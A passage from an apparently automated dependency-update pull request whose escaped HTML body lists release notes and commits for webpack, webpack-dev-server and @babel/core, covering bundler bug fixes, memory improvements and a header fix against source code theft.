href=\"https://redirect.github.com/webpack/webpack/pull/21018\"\u003e#21018\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eResolve chunk-hash placeholders in chunk URLs embedded into extracted HTML. (by \u003ca href=\"https://github.com/alexander-akait\"\u003e\u003ccode\u003e@​alexander-akait\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/webpack/webpack/pull/21018\"\u003e#21018\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eRemove unnecessary \u003ccode\u003e__webpack_require__\u003c/code\u003e runtime helpers in ESM library output with multi-module chunks. (by \u003ca href=\"https://github.com/xiaoxiaojx\"\u003e\u003ccode\u003e@​xiaoxiaojx\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/webpack/webpack/pull/21032\"\u003e#21032\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eRewrite \u003ccode\u003eNormalModule#getSideEffectsConnectionState\u003c/code\u003e walk as an allocation-light iterative loop instead of a generator trampoline, restoring rebuild performance lost in \u003ca href=\"https://redirect.github.com/webpack/webpack/issues/20993\"\u003e#20993\u003c/a\u003e while keeping deep import chains stack-safe. (by \u003ca href=\"https://github.com/alexander-akait\"\u003e\u003ccode\u003e@​alexander-akait\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/webpack/webpack/pull/21014\"\u003e#21014\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eFix runtime \u003ccode\u003eReferenceError\u003c/code\u003e on the first activation of a lazy-compiled module when \u003ccode\u003eoutput.library.type\u003c/code\u003e produces a closure-wrapped bundle (\u003ccode\u003eumd\u003c/code\u003e, \u003ccode\u003eumd2\u003c/code\u003e, \u003ccode\u003eamd\u003c/code\u003e, \u003ccode\u003eamd-require\u003c/code\u003e, \u003ccode\u003esystem\u003c/code\u003e). (by \u003ca href=\"https://github.com/alexander-akait\"\u003e\u003ccode\u003e@​alexander-akait\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/webpack/webpack/pull/21013\"\u003e#21013\u003c/a\u003e)\u003c/p\u003e\n\u003cp\u003eExternal modules of these types reference closure-bound identifiers like \u003ccode\u003e__WEBPACK_EXTERNAL_MODULE_react__\u003c/code\u003e, supplied by the library wrapper that is generated once per chunk. When \u003ccode\u003elazyCompilation\u003c/code\u003e activates an entry or import for the first time, any external dependency the lazily-built module pulls in arrives in a hot-update chunk that lives outside the original wrapper closure, so its factory body cannot resolve the closure identifier and only a manual page refresh recovers.\u003c/p\u003e\n\u003cp\u003eThe inactive \u003ccode\u003eLazyCompilationProxyModule\u003c/code\u003e now declares statically-enumerable externals (string and object forms of \u003ccode\u003eexternals\u003c/code\u003e) as its own dependencies, so the initial entry chunk's library wrapper already exposes their closure identifiers. When activation later pulls in those externals through the lazily-compiled module, they resolve to the already-installed factories instead of throwing. Function and RegExp externals are not pre-populated because their effective request set isn't knowable up front.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eFill in missing \u003ccode\u003eentryOptions\u003c/code\u003e when an async block joins an existing entrypoint. (by \u003ca href=\"https://github.com/alexander-akait\"\u003e\u003ccode\u003e@​alexander-akait\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/webpack/webpack/pull/21026\"\u003e#21026\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eRelease per-child \u003ccode\u003ecodeGenerationResults\u003c/code\u003e in \u003ccode\u003eMultiCompiler\u003c/code\u003e and at \u003ccode\u003eCompiler.close\u003c/code\u003e to reduce memory retention. (by \u003ca href=\"https://github.com/alexander-akait\"\u003e\u003ccode\u003e@​alexander-akait\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/webpack/webpack/pull/21015\"\u003e#21015\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eReduce peak memory of \u003ccode\u003eSourceMapDevToolPlugin\u003c/code\u003e on large builds (closes \u003ca href=\"https://redirect.github.com/webpack/webpack/issues/20961\"\u003e#20961\u003c/a\u003e). (by \u003ca href=\"https://github.com/alexander-akait\"\u003e\u003ccode\u003e@​alexander-akait\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/webpack/webpack/pull/20963\"\u003e#20963\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eFix slow \u003ccode\u003erequire.context()\u003c/code\u003e / dynamic \u003ccode\u003eimport()\u003c/code\u003e rebuilds in watch mode (\u003ca href=\"https://redirect.github.com/webpack/webpack/issues/13636\"\u003e#13636\u003c/a\u003e). When a file inside a watched context directory changed, \u003ccode\u003eNodeWatchFileSystem\u003c/code\u003e would call \u003ccode\u003einputFileSystem.purge(contextDir)\u003c/code\u003e. The enhanced-resolve \u003ccode\u003epurge\u003c/code\u003e implementation matches cache keys with \u003ccode\u003ekey.startsWith(contextDir)\u003c/code\u003e, so the stat cache of every file under the directory was discarded on every rebuild — \u003ccode\u003eContextModuleFactory.resolveDependencies\u003c/code\u003e then re-\u003ccode\u003estat\u003c/code\u003e-ed the whole tree on each rebuild. Single-file rebuilds on a 4000-file context now reuse the warm stat cache, dropping median rebuild from ~1260 ms to ~650 ms in a local reproduction (≈49%). For directory items that are explicitly watched contexts, \u003ccode\u003epurge\u003c/code\u003e is now called with \u003ccode\u003e{ exact: true }\u003c/code\u003e (added in \u003ccode\u003eenhanced-resolve@5.22.0\u003c/code\u003e) so only the directory's own entry is invalidated; file-level changes in the same aggregated event continue to purge file stats and the parent \u003ccode\u003ereaddir\u003c/code\u003e as before. (by \u003ca href=\"https://github.com/alexander-akait\"\u003e\u003ccode\u003e@​alexander-akait\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/webpack/webpack/pull/21020\"\u003e#21020\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e5.107.1\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eAlign the experimental HTML tokenizer with the WHATWG spec: fix offset-range bugs in the script-data, content-mode end-tag, attribute-value, and EOF states; surface tokenizer parse errors to consumers via a new \u003ccode\u003eparseError\u003c/code\u003e callback (\u003ccode\u003e\u0026quot;warning\u0026quot;\u003c/code\u003e when the tokenizer recovers and the emitted token is still well-formed, \u003ccode\u003e\u0026quot;error\u0026quot;\u003c/code\u003e when the offset range is incomplete — e.g. \u003ccode\u003eeof-in-tag\u003c/code\u003e); and add the full WHATWG named character references table so \u003ccode\u003edecodeHtmlEntities\u003c/code\u003e handles all named entities (including legacy bare forms like \u003ccode\u003e\u0026amp;AMP\u003c/code\u003e and multi-code-point entities like \u003ccode\u003e\u0026amp;NotEqualTilde;\u003c/code\u003e) with proper longest-prefix backtracking. (by \u003ca href=\"https://github.com/alexander-akait\"\u003e\u003ccode\u003e@​alexander-akait\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/webpack/webpack/pull/21000\"\u003e#21000\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eTree-shake CommonJS modules imported through a \u003ccode\u003econst NAME = require(LITERAL)\u003c/code\u003e binding when only static members of \u003ccode\u003eNAME\u003c/code\u003e are read. Previously webpack treated every export of such modules as referenced (because the bare \u003ccode\u003erequire()\u003c/code\u003e dependency reports \u003ccode\u003eEXPORTS_OBJECT_REFERENCED\u003c/code\u003e), so unused \u003ccode\u003eexports.x = ...\u003c/code\u003e assignments remained in the bundle even with \u003ccode\u003eusedExports\u003c/code\u003e enabled. The parser now forwards \u003ccode\u003eNAME.x\u003c/code\u003e / \u003ccode\u003eNAME.x()\u003c/code\u003e / \u003ccode\u003eNAME[\u0026quot;x\u0026quot;]\u003c/code\u003e accesses to the underlying \u003ccode\u003eCommonJsRequireDependency\u003c/code\u003e as referenced exports, falling back to the full exports object the moment \u003ccode\u003eNAME\u003c/code\u003e is read in any other context (passed by value, destructured later, accessed with a dynamic key, …). This brings the binding form to parity with the existing destructuring form (\u003ccode\u003econst { x } = require(...)\u003c/code\u003e). (by \u003ca href=\"https://github.com/alexander-akait\"\u003e\u003ccode\u003e@​alexander-akait\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/webpack/webpack/pull/21003\"\u003e#21003\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eFix \u003ccode\u003eRangeError: Maximum call stack size exceeded\u003c/code\u003e thrown from \u003ccode\u003eHarmonyImportSideEffectDependency.getModuleEvaluationSideEffectsState\u003c/code\u003e on long linear chains of side-effect-free imports. \u003ccode\u003eNormalModule.getSideEffectsConnectionState\u003c/code\u003e previously descended through \u003ccode\u003eHarmonyImportSideEffectDependency.getModuleEvaluationSideEffectsState\u003c/code\u003e recursively, adding two stack frames per module, which overflowed V8's stack at a few thousand modules deep. The traversal is now iterative. (by \u003ca href=\"https://github.com/alexander-akait\"\u003e\u003ccode\u003e@​alexander-akait\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/webpack/webpack/pull/20993\"\u003e#20993\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eFix \u003ccode\u003eNormalModuleFactory\u003c/code\u003e parser/generator types: (by \u003ca href=\"https://github.com/alexander-akait\"\u003e\u003ccode\u003e@​alexander-akait\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/webpack/webpack/pull/20999\"\u003e#20999\u003c/a\u003e)\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003emodule.generator.html\u003c/code\u003e now uses \u003ccode\u003eHtmlGeneratorOptions\u003c/code\u003e instead of \u003ccode\u003eEmptyGeneratorOptions\u003c/code\u003e (the \u003ccode\u003eextract\u003c/code\u003e option was hidden from the \u003ccode\u003ecreateGenerator\u003c/code\u003e / \u003ccode\u003egenerator\u003c/code\u003e hook types).\u003c/li\u003e\n\u003cli\u003eWebAssembly (\u003ccode\u003ewebassembly/async\u003c/code\u003e, \u003ccode\u003ewebassembly/sync\u003c/code\u003e) generator hooks now use \u003ccode\u003eEmptyGeneratorOptions\u003c/code\u003e instead of \u003ccode\u003eEmptyParserOptions\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eNormalModuleFactory#getParser\u003c/code\u003e / \u003ccode\u003ecreateParser\u003c/code\u003e / \u003ccode\u003egetGenerator\u003c/code\u003e / \u003ccode\u003ecreateGenerator\u003c/code\u003e are now generic over the module-type string, returning the specific parser/generator class for known types (e.g. \u003ccode\u003eJavascriptParser\u003c/code\u003e for \u003ccode\u003e\u0026quot;javascript/auto\u0026quot;\u003c/code\u003e, \u003ccode\u003eCssGenerator\u003c/code\u003e for \u003ccode\u003e\u0026quot;css\u0026quot;\u003c/code\u003e, etc.) instead of always returning the base \u003ccode\u003eParser\u003c/code\u003e / \u003ccode\u003eGenerator\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eNormalModuleCreateData\u003c/code\u003e is now generic over the module type so \u003ccode\u003eparser\u003c/code\u003e, \u003ccode\u003eparserOptions\u003c/code\u003e, \u003ccode\u003egenerator\u003c/code\u003e, and \u003ccode\u003egeneratorOptions\u003c/code\u003e are narrowed to the specific class / options for the given \u003ccode\u003etype\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eLink import bindings used inside \u003ccode\u003edefine(...)\u003c/code\u003e callbacks in ES modules. Previously, \u003ccode\u003eHarmonyDetectionParserPlugin\u003c/code\u003e skipped walking the arguments of \u003ccode\u003edefine\u003c/code\u003e calls in harmony modules, so references to imported bindings inside an inline AMD \u003ccode\u003edefine\u003c/code\u003e factory (e.g. \u003ccode\u003edefine(function () { console.log(foo); })\u003c/code\u003e) were not rewritten to their imported references and could cause \u003ccode\u003eReferenceError\u003c/code\u003e at runtime. Inner graph usage analysis is also fixed for the related pattern \u003ccode\u003econst fn = function () { foo; }; define(fn);\u003c/code\u003e. (by \u003ca href=\"https://github.com/alexander-akait\"\u003e\u003ccode\u003e@​alexander-akait\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/webpack/webpack/pull/20990\"\u003e#20990\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eHTML-entry pipeline (\u003ccode\u003eexperiments.html\u003c/code\u003e + \u003ccode\u003eexperiments.css\u003c/code\u003e): emit \u003ccode\u003e\u0026lt;link rel=\u0026quot;stylesheet\u0026quot;\u0026gt;\u003c/code\u003e tags for CSS chunks reachable from a \u003ccode\u003e\u0026lt;script src\u0026gt;\u003c/code\u003e entry. Previously when the bundled JS imported CSS, the resulting \u003ccode\u003e.css\u003c/code\u003e file was emitted to disk but never referenced from the extracted HTML (no \u003ccode\u003e\u0026lt;link\u0026gt;\u003c/code\u003e tag), and when \u003ccode\u003esplitChunks\u003c/code\u003e extracted CSS into sibling chunks the HTML cloned the originating \u003ccode\u003e\u0026lt;script\u0026gt;\u003c/code\u003e for each one — producing \u003ccode\u003e\u0026lt;script src=\u0026quot;style.js\u0026quot;\u0026gt;\u003c/code\u003e pointing at non-existent JS filenames instead of \u003ccode\u003e\u0026lt;link rel=\u0026quot;stylesheet\u0026quot; href=\u0026quot;style.css\u0026quot;\u0026gt;\u003c/code\u003e. CSS chunks are now sorted by the entrypoint's module post-order index so the \u003ccode\u003e\u0026lt;link\u0026gt;\u003c/code\u003e tags also appear in source import order, fixing the cascade ordering issue documented in \u003ccode\u003ehtml-webpack-plugin#1838\u003c/code\u003e and \u003ccode\u003ewebpack/mini-css-extract-plugin#959\u003c/code\u003e for HTML-entry builds. \u003ccode\u003enonce\u003c/code\u003e/\u003ccode\u003ecrossorigin\u003c/code\u003e/\u003ccode\u003ereferrerpolicy\u003c/code\u003e are copied from the originating tag onto the emitted \u003ccode\u003e\u0026lt;link\u0026gt;\u003c/code\u003e. (by \u003ca href=\"https://github.com/alexander-akait\"\u003e\u003ccode\u003e@​alexander-akait\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/webpack/webpack/pull/21002\"\u003e#21002\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/cfb24a4af6ea68034b25f80e14f95aaeaad6d596\"\u003e\u003ccode\u003ecfb24a4\u003c/code\u003e\u003c/a\u003e chore(release): new release (\u003ca href=\"https://redirect.github.com/webpack/webpack/issues/21019\"\u003e#21019\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/c7d8a3a7f411dd9910cf66ef0d09a3a1bf6686bd\"\u003e\u003ccode\u003ec7d8a3a\u003c/code\u003e\u003c/a\u003e fix: release per-child Compilation heap pressure in MultiCompiler (\u003ca href=\"https://redirect.github.com/webpack/webpack/issues/21015\"\u003e#21015\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/d6cdebe5e67008cfd717953634449ad283fd0334\"\u003e\u003ccode\u003ed6cdebe\u003c/code\u003e\u003c/a\u003e fix: regression in types for ProgressPlugin (\u003ca href=\"https://redirect.github.com/webpack/webpack/issues/21036\"\u003e#21036\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/c07389012566fe5d2cb56bd64ee76fb185a1bbb2\"\u003e\u003ccode\u003ec073890\u003c/code\u003e\u003c/a\u003e fix: gap-fill entryOptions when an async block reuses an existing entrypoint ...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/78158f087641803b7b5b20296b729861cdef7840\"\u003e\u003ccode\u003e78158f0\u003c/code\u003e\u003c/a\u003e docs: streamline AGENTS.md to reduce AI hallucination (\u003ca href=\"https://redirect.github.com/webpack/webpack/issues/21033\"\u003e#21033\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/c61c6499cc0b89ddbfc52a96cd4be081fb530d0f\"\u003e\u003ccode\u003ec61c649\u003c/code\u003e\u003c/a\u003e test: fail on missing per-kind snapshot instead of auto-writing it (\u003ca href=\"https://redirect.github.com/webpack/webpack/issues/21027\"\u003e#21027\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/a514897fcac61b8bc7aa13e32fae456bffdcd080\"\u003e\u003ccode\u003ea514897\u003c/code\u003e\u003c/a\u003e docs: update examples (\u003ca href=\"https://redirect.github.com/webpack/webpack/issues/21031\"\u003e#21031\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/cc4035b460ff15065af52360cb40baad4fbb8851\"\u003e\u003ccode\u003ecc4035b\u003c/code\u003e\u003c/a\u003e fix: remove unnecessary \u003cstrong\u003ewebpack_require\u003c/strong\u003e in ESM library output (\u003ca href=\"https://redirect.github.com/webpack/webpack/issues/21032\"\u003e#21032\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/12cb8251190cd481d78ea4252d652e75b0427f42\"\u003e\u003ccode\u003e12cb825\u003c/code\u003e\u003c/a\u003e docs(buildChunkGraph): explain why blocksWithNestedBlocks gates the skip (\u003ca href=\"https://redirect.github.com/webpack/webpack/issues/21\"\u003e#21\u003c/a\u003e...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/75f60f6b7f25b70d25aaf5cfa55d212b7a845120\"\u003e\u003ccode\u003e75f60f6\u003c/code\u003e\u003c/a\u003e fix(ConcatenatedModule): include runtimeCondition of external infos in update...\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/webpack/webpack/compare/v5.105.4...v5.107.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `webpack-dev-server` from 5.2.3 to 5.2.4\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack-dev-server/releases\"\u003ewebpack-dev-server's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.2.4\u003c/h2\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.3...v5.2.4\"\u003e5.2.4\u003c/a\u003e (2026-05-11)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eset Cross-Origin-Resource-Policy header to prevent source code theft over HTTP\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack-dev-server/blob/main/CHANGELOG.md\"\u003ewebpack-dev-server's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.3...v5.2.4\"\u003e5.2.4\u003c/a\u003e (2026-05-11)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eset Cross-Origin-Resource-Policy header to prevent source code theft over HTTP\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/fd401308f1cc026262880e2dab810004d6444282\"\u003e\u003ccode\u003efd40130\u003c/code\u003e\u003c/a\u003e chore(release): 5.2.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/ece4f3617bea31fb6d3833f69a32b6c289959a49\"\u003e\u003ccode\u003eece4f36\u003c/code\u003e\u003c/a\u003e chore: update deps (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5661\"\u003e#5661\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/a2161442a314a06a97e25d1404d08410cb4e9c51\"\u003e\u003ccode\u003ea216144\u003c/code\u003e\u003c/a\u003e ci: fix test (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5658\"\u003e#5658\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/df073c53a8cefb54210b43813fa6ee60364a554e\"\u003e\u003ccode\u003edf073c5\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.3...v5.2.4\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@babel/core` from 7.29.0 to 7.29.7\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/babel/babel/releases\"\u003e@​babel/core's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev7.29.7 (2026-05-25)\u003c/h2\u003e\n\u003cp\u003eRe-release all packages with npm provenance attestations\u003c/p\u003e\n\u003ch2\u003ev7.29.6 (2026-05-25)\u003c/h2\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-generator\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/18014\"\u003e#18014\u003c/a\u003e Catchup source map position in preserveFormat (\u003ca href=\"https://github.com/nicolo-ribaudo\"\u003e\u003ccode\u003e@​nicolo-ribaudo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-core\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/18001\"\u003e#18001\u003c/a\u003e [7.x packport]Improve input source map handling (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-core\u003c/code\u003e, \u003ccode\u003ebabel-generator\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17998\"\u003e#17998\u003c/a\u003e Preserve original identifier names from input sourcemaps (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-core/issues/17992\"\u003e#17992\u003c/a\u003e) (\u003ca href=\"https://github.com/Andarist\"\u003e\u003ccode\u003e@​Andarist\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eCommitters: 3\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eHuáng Jùnliàng (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eMateusz Burzyński (\u003ca href=\"https://github.com/Andarist\"\u003e\u003ccode\u003e@​Andarist\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eNicolò Ribaudo (\u003ca href=\"https://github.com/nicolo-ribaudo\"\u003e\u003ccode\u003e@​nicolo-ribaudo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.29.5 (2026-05-05)\u003c/h2\u003e\n\u003ch4\u003e:house:  Internal\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-preset-env\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate \u003ccode\u003e@babel/*\u003c/code\u003e dependencies\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.29.4 (2026-05-05)\u003c/h2\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-plugin-transform-modules-systemjs\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17974\"\u003e#17974\u003c/a\u003e [7.x backport]fix(systemjs): improve module string name support (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eCommitters: 1\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eHuáng Jùnliàng (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.29.3 (2026-04-30)\u003c/h2\u003e\n\u003ch4\u003e:eyeglasses: Spec Compliance\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-parser\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17923\"\u003e#17923\u003c/a\u003e Support flow extends bound (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-helper-create-class-features-plugin\u003c/code\u003e, \u003ccode\u003ebabel-plugin-proposal-decorators\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17931\"\u003e#17931\u003c/a\u003e fix(decorators): replace super within all removed static elements (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-register\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17915\"\u003e#17915\u003c/a\u003e Fix thread synchronization issues in \u003ccode\u003e@babel/register\u003c/code\u003e (\u003ca href=\"https://github.com/liuxingbaoyu\"\u003e\u003ccode\u003e@​liuxingbaoyu\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-compat-data\u003c/code\u003e, \u003ccode\u003ebabel-plugin-bugfix-safari-rest-destructuring-rhs-array\u003c/code\u003e, \u003ccode\u003ebabel-preset-env\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17788\"\u003e#17788\u003c/a\u003e Add bugfix plugin for Safari array rest destructuring bug (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:nail_care: Polish\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-parser\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/4fba7541180bf5f58256d8e358b544e3831ad090\"\u003e\u003ccode\u003e4fba754\u003c/code\u003e\u003c/a\u003e v7.29.7\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/04ea6b27fdac8f40c3481aec2080ac9678779509\"\u003e\u003ccode\u003e04ea6b2\u003c/code\u003e\u003c/a\u003e v7.29.6\u003c/li\u003e\n\u003cli\u003e\u003ca 